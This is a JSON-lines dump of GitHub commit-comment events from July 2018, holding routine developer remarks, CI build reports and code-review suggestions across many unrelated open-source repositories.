{"id":"7986613879","type":"CommitCommentEvent","actor":{"login":"xweipbcsf"},"repo":{"name":"xweipbcsf/pbcsf_fintech_center_xk"},"payload":{"comment":{"id":29758713,"position":null,"line":null,"path":null,"commit_id":"c84747554a9e0e97badaaebded04ad8cf2cb33c4","created_at":"2018-07-19T03:14:15Z","updated_at":"2018-07-19T03:14:15Z","author_association":"OWNER","body":"applied financial network with machine learning"}},"created_at":"2018-07-19T03:14:15Z"}
{"id":"7986613901","type":"CommitCommentEvent","actor":{"login":"robbyoung"},"repo":{"name":"robbyoung/HabbajetAngular"},"payload":{"comment":{"id":29758714,"position":null,"line":null,"path":null,"commit_id":"af35b5b03916753fa210e8304e6a0285e603b4f1","created_at":"2018-07-19T03:14:15Z","updated_at":"2018-07-19T03:14:15Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Stage 0 at Week's End](https://trello.com/c/cnm5Jq1Y/32-stage-0-at-weeks-end)"}},"created_at":"2018-07-19T03:14:15Z"}
{"id":"7986615960","type":"CommitCommentEvent","actor":{"login":"linlycode"},"repo":{"name":"linlycode/olcode"},"payload":{"comment":{"id":29758716,"position":null,"line":null,"path":null,"commit_id":"95f860fb02425bf8d81bb6b0265816e1bd8b2406","created_at":"2018-07-19T03:15:03Z","updated_at":"2018-07-19T03:15:03Z","author_association":"OWNER","body":"Why adding vendor code? Don't we just install the dependencies?"}},"created_at":"2018-07-19T03:15:03Z"}
{"id":"7986620466","type":"CommitCommentEvent","actor":{"login":"world-contributer"},"repo":{"name":"world-contributer/Whu-navigationers"},"payload":{"comment":{"id":29758732,"position":3,"line":3,"path":"KFApp.h","commit_id":"61d28901a6c1b4a2940e9a53f2c59eaf261618a7","created_at":"2018-07-19T03:16:42Z","updated_at":"2018-07-19T03:16:42Z","author_association":"OWNER","body":"copyright claim"}},"created_at":"2018-07-19T03:16:42Z"}
{"id":"7986623481","type":"CommitCommentEvent","actor":{"login":"MichaelB7"},"repo":{"name":"locutus2/Stockfish"},"payload":{"comment":{"id":29758735,"position":null,"line":null,"path":null,"commit_id":"fc03a66093bc157be3a8126b19850b12b5f83568","created_at":"2018-07-19T03:17:48Z","updated_at":"2018-07-19T03:17:48Z","author_association":"NONE","body":"Very nice - congrats!"}},"created_at":"2018-07-19T03:17:48Z"}
{"id":"7986631124","type":"CommitCommentEvent","actor":{"login":"robbyoung"},"repo":{"name":"robbyoung/HabbajetAngular"},"payload":{"comment":{"id":29758743,"position":null,"line":null,"path":null,"commit_id":"3d849e055ae084cfca26c1938fa23835c749c2b8","created_at":"2018-07-19T03:20:43Z","updated_at":"2018-07-19T03:20:43Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Add Strings.xml to build script](https://trello.com/c/imWpW71R/42-add-stringsxml-to-build-script)"}},"created_at":"2018-07-19T03:20:43Z"}
{"id":"7986653733","type":"CommitCommentEvent","actor":{"login":"mpsrig"},"repo":{"name":"restic/restic"},"payload":{"comment":{"id":29758792,"position":37,"line":640,"path":"cmd/restic/global.go","commit_id":"fe99340e408f55a270096f08f68a2f0e2a6629c3","created_at":"2018-07-19T03:29:35Z","updated_at":"2018-07-19T03:29:35Z","author_association":"NONE","body":"@fd0 Can you clarify why this is using `rclone.Open` instead of `rclone.Create`?  Looks like as a result `rclone.Create` is dead code except for tests."}},"created_at":"2018-07-19T03:29:35Z"}
{"id":"7986661176","type":"CommitCommentEvent","actor":{"login":"dcbenwu"},"repo":{"name":"dcbenwu/mutilThreadDemo"},"payload":{"comment":{"id":29758812,"position":null,"line":null,"path":null,"commit_id":"0abe9696ba8d2ebe33e03ad8eddacaf500066a4a","created_at":"2018-07-19T03:32:26Z","updated_at":"2018-07-19T03:32:26Z","author_association":"OWNER","body":"I find the job has not been triggered after serveral days running. So, I add this log to try to track it. And to see if this job did not triggered by cron."}},"created_at":"2018-07-19T03:32:26Z"}
{"id":"7986663513","type":"CommitCommentEvent","actor":{"login":"Planeshifter"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":29758816,"position":74,"line":74,"path":"lib/node_modules/@stdlib/stats/incr/mpcorr2/test/test.js","commit_id":"e6bc812ab63010afd0f25418c0c6954c3a680357","created_at":"2018-07-19T03:33:22Z","updated_at":"2018-07-19T03:33:22Z","author_association":"MEMBER","body":"Can we change this wording? Although I understand the intent, strictly speaking the \"population standard deviation\" is the *true* standard deviation calculated over the entire population. Instead, I propose: \"compute a __biased__ standard deviation\".\r\n\r\nPackages with functions containing this or a similar parameter description in their `test.js` file are:\r\n`mpcorr2`, `mpcorr`, `mpcorrdist`, `mapcorr`, `mcovariance`."}},"created_at":"2018-07-19T03:33:22Z"}
{"id":"7986664298","type":"CommitCommentEvent","actor":{"login":"nfitzen"},"repo":{"name":"nfitzen/nfitzen.github.io"},"payload":{"comment":{"id":29758818,"position":5,"line":6,"path":"_layouts/default.html","commit_id":"1359add2fb1c5354dd72db8fae19a80e016c24c8","created_at":"2018-07-19T03:33:39Z","updated_at":"2018-07-19T03:33:39Z","author_association":"OWNER","body":"Whoops LOL 😂"}},"created_at":"2018-07-19T03:33:39Z"}
{"id":"7986665940","type":"CommitCommentEvent","actor":{"login":"narspt"},"repo":{"name":"juribeparada/MMDVM_HS"},"payload":{"comment":{"id":29758824,"position":null,"line":null,"path":null,"commit_id":"46ba5cc4f74d072aa545fd54fc5b64bb473e65bd","created_at":"2018-07-19T03:34:17Z","updated_at":"2018-07-19T03:34:17Z","author_association":"NONE","body":"Hi Andy, I did test the firmware with your changes for some long QSO's today, as well as I did also install it on the hotspots of two friends that suffered from the same problem as me and so far we couldn't reproduce it today! I have been on long QSO from the far place of my home that was usually very problematic and despite the weak RSSI (see attached logs at bottom) the problem just didn't happen, there was no \"transmission lost\" lines on my MMDVMHost log at all and the colleagues in the QSO (and doing the test with me) confirm that there were no unrecoverable transmission cuts issue as it used to happen from time to time.\r\n\r\nThe only little \"glitch\" that may be worth mentioning during the tests was: if you check my logs, look near 15:30, there was no \"transmission lost\" on MMDVMHost log at all as I did mention above, but you can see that min RSSI was very low for that specific transmission (I think it was caused by some brief strong interference on adjacent frequency, as I could even notice something on another analog radio I had in RX at same time...), now if you look at ircddbgateway log you can see that a \"Radio watchdog timer for CT2HRB B has expired\" happened at that time, also colleagues I was in QSO with did told me that there was just an audio \"glitch\" at that transmission but it recovered well and did continue with no problem at all, then it was not actually a problem at all, but JFYI.\r\n\r\nI will continue doing more extended testing tomorrow, but so far it looks very promising, apparently it seems much more robust to handle weak/interfered signal after your changes. I will tell you something more after further testing. Many thanks again Andy!\r\n\r\nLogs:\r\n[MMDVM-2018-07-18.log](https://github.com/juribeparada/MMDVM_HS/files/2208047/MMDVM-2018-07-18.log)\r\n[ircDDBGateway-2018-07-18.log](https://github.com/juribeparada/MMDVM_HS/files/2208049/ircDDBGateway-2018-07-18.log)\r\n"}},"created_at":"2018-07-19T03:34:17Z"}
{"id":"7986681390","type":"CommitCommentEvent","actor":{"login":"CuriousLaogeda"},"repo":{"name":"CuriousLaogeda/webAr"},"payload":{"comment":{"id":29758837,"position":null,"line":null,"path":null,"commit_id":"98e8741d82e29585d0a2bdd714035e729460acda","created_at":"2018-07-19T03:40:30Z","updated_at":"2018-07-19T03:40:30Z","author_association":"OWNER","body":"去"}},"created_at":"2018-07-19T03:40:30Z"}
{"id":"7986683944","type":"CommitCommentEvent","actor":{"login":"zoegrippo"},"repo":{"name":"zoegrippo/leetcode_solutions"},"payload":{"comment":{"id":29758840,"position":null,"line":null,"path":null,"commit_id":"1595f1bb952f976f5f3569c0f9ad82e2ce7311fb","created_at":"2018-07-19T03:41:32Z","updated_at":"2018-07-19T03:41:32Z","author_association":"OWNER","body":"repeated breadth first search problem"}},"created_at":"2018-07-19T03:41:32Z"}
{"id":"7986685243","type":"CommitCommentEvent","actor":{"login":"deitybyx"},"repo":{"name":"deitybyx/hog_ZebraTracker"},"payload":{"comment":{"id":29758844,"position":null,"line":null,"path":null,"commit_id":"183a75e45f1b8c64296252b902bb82374ca48ace","created_at":"2018-07-19T03:42:03Z","updated_at":"2018-07-19T03:42:03Z","author_association":"OWNER","body":"This software is the generated dataset of manuscript \"Automatic multiple zebrafish tracking based on improved HOG features\" publised on Scientific report. If you want to use the software, please indicate the reference: Yun-Xiang Bai, Shu-Hui Zhang, Zhi Fan, Xing-Yu Liu, Xin Zhao, Xi-Zeng Feng & Ming-Zhu Sun.Automatic multiple zebrafish tracking based on improved HOG features.Sci .Rep.8(10884),https://doi.org/10.1038/s41598-018-29185-0\r\n\r\nThis file explains the usage of included binary and MATLAB code. Detailed information of each script is listed inside each script.\r\n\r\nThe code is applied to MATLAB015b and above. The file Trace.m is the entry to the GUI interface. The format of input video is AVI with high expansibility."}},"created_at":"2018-07-19T03:42:03Z"}
{"id":"7986687235","type":"CommitCommentEvent","actor":{"login":"deitybyx"},"repo":{"name":"deitybyx/hog_ZebraTracker"},"payload":{"comment":{"id":29758852,"position":null,"line":null,"path":null,"commit_id":"183a75e45f1b8c64296252b902bb82374ca48ace","created_at":"2018-07-19T03:42:53Z","updated_at":"2018-07-19T03:42:53Z","author_association":"OWNER","body":"This software is the generated dataset of manuscript \"Automatic multiple zebrafish tracking based on improved HOG features\" publised on Scientific report. If you want to use the software, please indicate the reference: Yun-Xiang Bai, Shu-Hui Zhang, Zhi Fan, Xing-Yu Liu, Xin Zhao, Xi-Zeng Feng & Ming-Zhu Sun.Automatic multiple zebrafish tracking based on improved HOG features.Sci .Rep.8(10884),https://doi.org/10.1038/s41598-018-29185-0\r\n\r\nThis file explains the usage of included binary and MATLAB code. Detailed information of each script is listed inside each script.\r\n\r\nThe code is applied to MATLAB015b and above. The file Trace.m is the entry to the GUI interface. The format of input video is AVI with high expansibility."}},"created_at":"2018-07-19T03:42:53Z"}
{"id":"7986693097","type":"CommitCommentEvent","actor":{"login":"mibby"},"repo":{"name":"garbagemule/MobArena"},"payload":{"comment":{"id":29758863,"position":null,"line":null,"path":null,"commit_id":"e484583b7e0456da3c0287a1db26f473fde3d0f5","created_at":"2018-07-19T03:45:16Z","updated_at":"2018-07-19T03:45:16Z","author_association":"NONE","body":"What about cancelling the right click event if anything is being held, but allowing it for interaction if you have an empty hand? That way you prevent tnt, potions, and other stuff from going off while in the lobby?"}},"created_at":"2018-07-19T03:45:16Z"}
{"id":"7986694797","type":"CommitCommentEvent","actor":{"login":"chawoohong"},"repo":{"name":"summer-sb/MureokMureok"},"payload":{"comment":{"id":29758866,"position":22,"line":36,"path":"app/src/main/java/com/example/totoroto/mureok/example/example2/ExampleActivity.kt","commit_id":"8a761ec3c52d3eaac82ecc90c0309ebda4a39dca","created_at":"2018-07-19T03:45:59Z","updated_at":"2018-07-19T03:45:59Z","author_association":"COLLABORATOR","body":"flatMap을 쓰신건 잘하셨습니다.\r\nzipWith를 써도 되지만 기존에 작성하셨던것처럼 Single.zip을 그대로 썼어도 되는데 zipWith로 바꾸신 이유가 있나요?"}},"created_at":"2018-07-19T03:45:59Z"}
{"id":"7986697986","type":"CommitCommentEvent","actor":{"login":"rcushen"},"repo":{"name":"gracegeddes/IknowSomewhere"},"payload":{"comment":{"id":29758873,"position":null,"line":null,"path":null,"commit_id":"56fc5cf097b66b065d50c51260d9adf0f2ed7c1b","created_at":"2018-07-19T03:47:15Z","updated_at":"2018-07-19T03:47:15Z","author_association":"COLLABORATOR","body":"Beautiful @AlexTB411  - I now understand the commas thing."}},"created_at":"2018-07-19T03:47:15Z"}
{"id":"7986698509","type":"CommitCommentEvent","actor":{"login":"sabedevops"},"repo":{"name":"sabedevops/test"},"payload":{"comment":{"id":29758874,"position":null,"line":null,"path":null,"commit_id":"30d83027a8fddc4a58895c8c5e98ee6322cd1600","created_at":"2018-07-19T03:47:28Z","updated_at":"2018-07-19T03:47:28Z","author_association":"OWNER","body":"Testing Jenkins automation"}},"created_at":"2018-07-19T03:47:28Z"}
{"id":"7986698568","type":"CommitCommentEvent","actor":{"login":"Jorgecastanedal"},"repo":{"name":"Jorgecastanedal/ProyectoGraduacion"},"payload":{"comment":{"id":29758875,"position":null,"line":null,"path":null,"commit_id":"ff3946b09aafddee8c347b16da8e3f8ae3e9c8a0","created_at":"2018-07-19T03:47:30Z","updated_at":"2018-07-19T03:47:30Z","author_association":"OWNER","body":"DISEÑO DE UN SISTEMA INFORMÁTICO PARA EL CONTROL DE INVENTARIO DE FÁRMACOS E INSUMOS MÉDICOS PARA EL HOSPITAL DE NOR-ORIENTE, SEINSA  SANARATE EL PROGRESO."}},"created_at":"2018-07-19T03:47:30Z"}
{"id":"7986700799","type":"CommitCommentEvent","actor":{"login":"cugxuan"},"repo":{"name":"theme-next/hexo-theme-next"},"payload":{"comment":{"id":29758877,"position":null,"line":null,"path":null,"commit_id":"7d17575f01c94188cff7e5caaa122fc0384ffac9","created_at":"2018-07-19T03:48:26Z","updated_at":"2018-07-19T03:48:26Z","author_association":"NONE","body":"My blog has been used too. \r\nIt works if you modify the files according to the changes.\r\nSo excited! I could use its new features before nextV6.4.0!\r\nThank you so much!"}},"created_at":"2018-07-19T03:48:26Z"}
{"id":"7986706238","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29758887,"position":null,"line":null,"path":null,"commit_id":"211f6d675eb46d0db995370046ac66c541a48378","created_at":"2018-07-19T03:50:42Z","updated_at":"2018-07-19T03:50:42Z","author_association":"NONE","body":"#6517-MissingEqNumRefsInEngrgRef (RKStrand) - Win64-Windows-7-VisualStudio-14: OK (2942 of 2942 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-211f6d675eb46d0db995370046ac66c541a48378-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-211f6d675eb46d0db995370046ac66c541a48378-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-19T03:50:42Z"}
{"id":"7986706337","type":"CommitCommentEvent","actor":{"login":"LiXizhi"},"repo":{"name":"NPLPackages/main"},"payload":{"comment":{"id":29758888,"position":4,"line":39,"path":"script/ide/System/Windows/Controls/EditBox.lua","commit_id":"938e1d396253e2468a65dc4bcb4faae1b7809025","created_at":"2018-07-19T03:50:44Z","updated_at":"2018-07-19T03:50:44Z","author_association":"CONTRIBUTOR","body":"spelling encrypted"}},"created_at":"2018-07-19T03:50:44Z"}
{"id":"7986709403","type":"CommitCommentEvent","actor":{"login":"dmeltzer"},"repo":{"name":"snipe/snipe-it"},"payload":{"comment":{"id":29758891,"position":5,"line":23,"path":"database/migrations/2016_12_27_212631_make_asset_assigned_to_polymorphic.php","commit_id":"9dc226e3d68a3373162e4972930587fcbe954b93","created_at":"2018-07-19T03:52:02Z","updated_at":"2018-07-19T03:52:02Z","author_association":"CONTRIBUTOR","body":"I just took a look at this... I worry about this in an old migration.  This can be reduced to Asset::whereNotNull('assigned_to')->orWhereNotNull('assigned_to'), which is different.  There are old mysql databases where assigned_to might be ' ' instead of null, and this will not catch all of those values.  I there the number of people upgrading from the beginning of 2017 are going to be fairly small at this point, but worry that this will potentially cause issues for any that are... "}},"created_at":"2018-07-19T03:52:02Z"}
{"id":"7986709591","type":"CommitCommentEvent","actor":{"login":"Arza-3d"},"repo":{"name":"Arza-3d/ue4-battery-collector"},"payload":{"comment":{"id":29758892,"position":null,"line":null,"path":null,"commit_id":"ad0aed7ec9e6600d0e647b4d0cf9e06d23225163","created_at":"2018-07-19T03:52:07Z","updated_at":"2018-07-19T03:52:07Z","author_association":"OWNER","body":"This is common problem for many people from video 10, they can't collect the battery. My error in code is that I redeclared bIsActive twice, with bool, accidentally make local variable bIsActive inside the Pickup. cpp, when I should have edited the bIsActive that is already declared in the header of  Pickup.h.\r\nSo for me  Ijust delete the **bool**"}},"created_at":"2018-07-19T03:52:07Z"}
{"id":"7986714089","type":"CommitCommentEvent","actor":{"login":"nuelmakara"},"repo":{"name":"nuelmakara/QuizNinja"},"payload":{"comment":{"id":29758897,"position":14,"line":14,"path":"styles.css","commit_id":"b9cf6159c6658d5351767bd27a162a9288f68aa9","created_at":"2018-07-19T03:54:02Z","updated_at":"2018-07-19T03:54:02Z","author_association":"OWNER","body":"I used the underscore for this class name instead of an hyphen that was used at the HTML structure class assignment!"}},"created_at":"2018-07-19T03:54:02Z"}
{"id":"7986715201","type":"CommitCommentEvent","actor":{"login":"Irislm"},"repo":{"name":"ant-design/ant-design"},"payload":{"comment":{"id":29758901,"position":null,"line":null,"path":null,"commit_id":"4417dcf300c03ce03b5ca747ba464c82790c5a02","created_at":"2018-07-19T03:54:30Z","updated_at":"2018-07-19T03:54:30Z","author_association":"NONE","body":"请问只有3.7.0版本才支持count 传入ReactNode类型值吗"}},"created_at":"2018-07-19T03:54:30Z"}
{"id":"7986717867","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":29758908,"position":null,"line":null,"path":null,"commit_id":"6c47c245b476c8ec6d19734f1b5c5bcc52ebd624","created_at":"2018-07-19T03:55:34Z","updated_at":"2018-07-19T03:55:34Z","author_association":"NONE","body":"Executing the daily benchmark build, I will reply here when finished:\n\n@nanosoldier `runbenchmarks(ALL, isdaily = true)`\n"}},"created_at":"2018-07-19T03:55:34Z"}
{"id":"7986718125","type":"CommitCommentEvent","actor":{"login":"snipe"},"repo":{"name":"snipe/snipe-it"},"payload":{"comment":{"id":29758909,"position":5,"line":23,"path":"database/migrations/2016_12_27_212631_make_asset_assigned_to_polymorphic.php","commit_id":"9dc226e3d68a3373162e4972930587fcbe954b93","created_at":"2018-07-19T03:55:40Z","updated_at":"2018-07-19T03:55:40Z","author_association":"OWNER","body":"> I there the number of people upgrading from the beginning of 2017 are going to be fairly small at this point, but worry that this will potentially cause issues for any that are...\r\n\r\nI run into at least one persona  month upgrading from v1-alpha, I shit you not. \r\n\r\n@chemfy - can you take a look?"}},"created_at":"2018-07-19T03:55:40Z"}
{"id":"7986719888","type":"CommitCommentEvent","actor":{"login":"tejo-ak"},"repo":{"name":"akaunting/akaunting"},"payload":{"comment":{"id":29758912,"position":null,"line":null,"path":null,"commit_id":"d0c6e327c1cc3ad07e96d9bdc80a4ee79a9d2f9c","created_at":"2018-07-19T03:56:23Z","updated_at":"2018-07-19T03:56:23Z","author_association":"NONE","body":"I have different suggestions for your conversion approach that you could consider, I have tested it and it seems to work well\r\n\r\n- you could check if conversion is needed in the convert / reverseConvert / dynamicConvert methods of the App\\Traits\\Currencies\r\n```java\r\n public function convert($amount, $code, $rate, $format = false)\r\n    {\r\n        $default = new Currency(setting('general.default_currency', 'USD'));\r\n        if ($default->getCurrency() == $code) { // no need to convert\r\n\t\t    return $amount;\r\n\t    }\r\n        if ($format) {\r\n            $money = Money::$code($amount, true)->convert($default, (double) $rate)->format();\r\n        } else {\r\n            $money = Money::$code($amount)->convert($default, (double) $rate)->getAmount();\r\n        }\r\n\r\n        return $money;\r\n    }\r\n```\r\n- you need  1/$rate for the reverseConvert method\r\n```java\r\n public function reverseConvert($amount, $code, $rate, $format = false)\r\n    {\r\n       //...\r\n        $rate = 1/(double)$rate;\r\n        if ($format) {\r\n       //...\r\n        return $money;\r\n    }\r\n```\r\n\r\n- you need to consider the default_rate, in addition to default_code for the dynamicConvert. (principally using the dynamicConvert, what you need is to covert origin to default currency, and the convert again to the destination. so it should be a two steps of conversions )\r\n```java\r\n public function dynamicConvert($default, $defaultRate, $amount, $code, $rate, $format = false)\r\n    {\r\n       //...\r\n        $intermediateAmount = $this->convert($amount, $default, $defaultRate);\r\n        $endResult = $this->reverseConvert($intermediateAmount, $code, $rate);\r\n\r\n        return $endResult;\r\n```\r\nRegards"}},"created_at":"2018-07-19T03:56:23Z"}
{"id":"7986723122","type":"CommitCommentEvent","actor":{"login":"flateer"},"repo":{"name":"Medium/opensource"},"payload":{"comment":{"id":29758919,"position":null,"line":null,"path":null,"commit_id":"fda34468688a16507bc4fe8ceb8aa750a46f67b6","created_at":"2018-07-19T03:57:44Z","updated_at":"2018-07-19T03:57:44Z","author_association":"NONE","body":"Thx"}},"created_at":"2018-07-19T03:57:44Z"}
{"id":"7986726025","type":"CommitCommentEvent","actor":{"login":"FamousMai"},"repo":{"name":"FamousMai/laravel01"},"payload":{"comment":{"id":29758922,"position":null,"line":null,"path":null,"commit_id":"d5c23094266a9ef415d0264947c6bfced60e0af3","created_at":"2018-07-19T03:58:55Z","updated_at":"2018-07-19T03:58:55Z","author_association":"OWNER","body":"完成 第五章 用户模型"}},"created_at":"2018-07-19T03:58:55Z"}
{"id":"7986726839","type":"CommitCommentEvent","actor":{"login":"McDanielES"},"repo":{"name":"McDanielES/HelloWorld"},"payload":{"comment":{"id":29758924,"position":null,"line":null,"path":null,"commit_id":"387bf541e083df2ef934dc30b4de645d4859d9e7","created_at":"2018-07-19T03:59:16Z","updated_at":"2018-07-19T03:59:16Z","author_association":"OWNER","body":"Can anybody read this?"}},"created_at":"2018-07-19T03:59:16Z"}
{"id":"7986736003","type":"CommitCommentEvent","actor":{"login":"lukeapage"},"repo":{"name":"facebook/flow"},"payload":{"comment":{"id":29758942,"position":null,"line":null,"path":null,"commit_id":"19acbcf91fb03be04b167900211b25d18620cba3","created_at":"2018-07-19T04:02:51Z","updated_at":"2018-07-19T04:02:51Z","author_association":"CONTRIBUTOR","body":"@mrkev  Doesn’t ‘Flow_server_profile.init ();‘ need to be called to get profiling info?\r\nMy Pr only stopped the broken timer.."}},"created_at":"2018-07-19T04:02:51Z"}
{"id":"7986736214","type":"CommitCommentEvent","actor":{"login":"pp7351"},"repo":{"name":"getlantern/download"},"payload":{"comment":{"id":29758943,"position":null,"line":null,"path":null,"commit_id":"c5fd374862fcd8d8a4cb989ca51a16ebe870b621","created_at":"2018-07-19T04:02:56Z","updated_at":"2018-07-19T04:02:56Z","author_association":"NONE","body":"为什么无法上网了，中文论坛也不见了"}},"created_at":"2018-07-19T04:02:56Z"}
{"id":"7986738209","type":"CommitCommentEvent","actor":{"login":"pp7351"},"repo":{"name":"getlantern/download"},"payload":{"comment":{"id":29758945,"position":null,"line":null,"path":null,"commit_id":"c5fd374862fcd8d8a4cb989ca51a16ebe870b621","created_at":"2018-07-19T04:03:46Z","updated_at":"2018-07-19T04:03:46Z","author_association":"NONE","body":"希望蓝灯能坚挺啊  我是忠实的拥护者"}},"created_at":"2018-07-19T04:03:46Z"}
{"id":"7986745848","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29758960,"position":null,"line":null,"path":null,"commit_id":"3049276ae76d350b62a841abc11d20e053c2db67","created_at":"2018-07-19T04:06:59Z","updated_at":"2018-07-19T04:06:59Z","author_association":"NONE","body":"Follow-up-to-#6393-SZVAV-for-PTUnit (rraustad) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: Tests Failed (2400 of 2970 tests passed, 57 test warnings)\n\nMessages:\n\n * 627 tests had: EIO diffs.\n * 566 tests had: Table big diffs.\n * 169 tests had: ESO small diffs.\n * 1 test had: BND diffs.\n * 81 tests had: ESO big diffs.\n * 102 tests had: AUD diffs.\n * 103 tests had: MTR small diffs.\n * 40 tests had: MTR big diffs.\n * 19 tests had: ERR diffs.\n * 2 tests had: MTD diffs.\n * 1 test had: SSZ big diffs.\n * 1 test had: ZSZ big diffs.\n * 1 test had: Table small diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 73\n * Failed: 570\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3049276ae76d350b62a841abc11d20e053c2db67-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3049276ae76d350b62a841abc11d20e053c2db67-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-80.81%25-red.png)</a> \n"}},"created_at":"2018-07-19T04:06:59Z"}
{"id":"7986751031","type":"CommitCommentEvent","actor":{"login":"binarymist"},"repo":{"name":"binarymist/purpleteam-app-scanner"},"payload":{"comment":{"id":29758964,"position":null,"line":null,"path":null,"commit_id":"921eee90574104082143d44340f9b2a80cdd2545","created_at":"2018-07-19T04:09:13Z","updated_at":"2018-07-19T04:09:13Z","author_association":"OWNER","body":"As per #8 "}},"created_at":"2018-07-19T04:09:13Z"}
{"id":"7986751974","type":"CommitCommentEvent","actor":{"login":"szlin"},"repo":{"name":"jarun/pdd"},"payload":{"comment":{"id":29758966,"position":null,"line":null,"path":null,"commit_id":"2344deb7e5b465fddb2df054a9078119a59bd70d","created_at":"2018-07-19T04:09:35Z","updated_at":"2018-07-19T04:09:35Z","author_association":"NONE","body":"@jarun The new version of pdd has been uploaded."}},"created_at":"2018-07-19T04:09:35Z"}
{"id":"7986754664","type":"CommitCommentEvent","actor":{"login":"binarymist"},"repo":{"name":"binarymist/purpleteam-app-scanner"},"payload":{"comment":{"id":29758968,"position":null,"line":null,"path":null,"commit_id":"921eee90574104082143d44340f9b2a80cdd2545","created_at":"2018-07-19T04:10:43Z","updated_at":"2018-07-19T04:10:43Z","author_association":"OWNER","body":"This also covers #6 "}},"created_at":"2018-07-19T04:10:43Z"}
{"id":"7986755373","type":"CommitCommentEvent","actor":{"login":"candirufish"},"repo":{"name":"locutus2/Stockfish"},"payload":{"comment":{"id":29758971,"position":null,"line":null,"path":null,"commit_id":"fc03a66093bc157be3a8126b19850b12b5f83568","created_at":"2018-07-19T04:11:02Z","updated_at":"2018-07-19T04:11:02Z","author_association":"NONE","body":"Congrats! Also on the short pass on ltc, either a lucky run or a really strong ltc patch. Hope it is the latter ;)\r\n\r\nI guess it is now time for a regression test, hopefully we're close to 40 elos and another 10-20 elos more in a few months for sf10 release just in time for AlphaZero anniversary."}},"created_at":"2018-07-19T04:11:02Z"}
{"id":"7986756270","type":"CommitCommentEvent","actor":{"login":"shadowcypher"},"repo":{"name":"APStudentsReddit/ping_bot"},"payload":{"comment":{"id":29758973,"position":11,"line":11,"path":"main.py","commit_id":"aa0d0385f53dec5df2524eb266e4b58e4483295e","created_at":"2018-07-19T04:11:24Z","updated_at":"2018-07-19T04:11:24Z","author_association":"COLLABORATOR","body":"Nah, this is completely fine. I could use a local Pickle or something, but Firebase is viable, since it's so easy to set up."}},"created_at":"2018-07-19T04:11:24Z"}
{"id":"7986757692","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29758975,"position":null,"line":null,"path":null,"commit_id":"3049276ae76d350b62a841abc11d20e053c2db67","created_at":"2018-07-19T04:11:59Z","updated_at":"2018-07-19T04:11:59Z","author_association":"NONE","body":"Follow-up-to-#6393-SZVAV-for-PTUnit (rraustad) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3049276ae76d350b62a841abc11d20e053c2db67-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-19T04:11:59Z"}
{"id":"7986758447","type":"CommitCommentEvent","actor":{"login":"shadowcypher"},"repo":{"name":"APStudentsReddit/ping_bot"},"payload":{"comment":{"id":29758976,"position":16,"line":16,"path":"main.py","commit_id":"aa0d0385f53dec5df2524eb266e4b58e4483295e","created_at":"2018-07-19T04:12:18Z","updated_at":"2018-07-19T04:12:18Z","author_association":"COLLABORATOR","body":"Which details? Login? That's necessary for firebase, although in the future I can generate accounts for the users"}},"created_at":"2018-07-19T04:12:18Z"}
{"id":"7986760153","type":"CommitCommentEvent","actor":{"login":"jarun"},"repo":{"name":"jarun/pdd"},"payload":{"comment":{"id":29758978,"position":null,"line":null,"path":null,"commit_id":"2344deb7e5b465fddb2df054a9078119a59bd70d","created_at":"2018-07-19T04:13:04Z","updated_at":"2018-07-19T04:13:04Z","author_association":"OWNER","body":"Thanks Lin!"}},"created_at":"2018-07-19T04:13:04Z"}
{"id":"7986760724","type":"CommitCommentEvent","actor":{"login":"yinghhou"},"repo":{"name":"yinghhou/kangwang"},"payload":{"comment":{"id":29758980,"position":null,"line":null,"path":null,"commit_id":"6216bea7ecb2e71cf075e80dd648439ce91da736","created_at":"2018-07-19T04:13:21Z","updated_at":"2018-07-19T04:13:21Z","author_association":"OWNER","body":"康王项目"}},"created_at":"2018-07-19T04:13:21Z"}
{"id":"7986767013","type":"CommitCommentEvent","actor":{"login":"sli1989"},"repo":{"name":"theme-next/hexo-theme-next"},"payload":{"comment":{"id":29758992,"position":null,"line":null,"path":null,"commit_id":"7d17575f01c94188cff7e5caaa122fc0384ffac9","created_at":"2018-07-19T04:16:02Z","updated_at":"2018-07-19T04:16:02Z","author_association":"COLLABORATOR","body":"@cugxuan has been merged, just pull the new master."}},"created_at":"2018-07-19T04:16:02Z"}
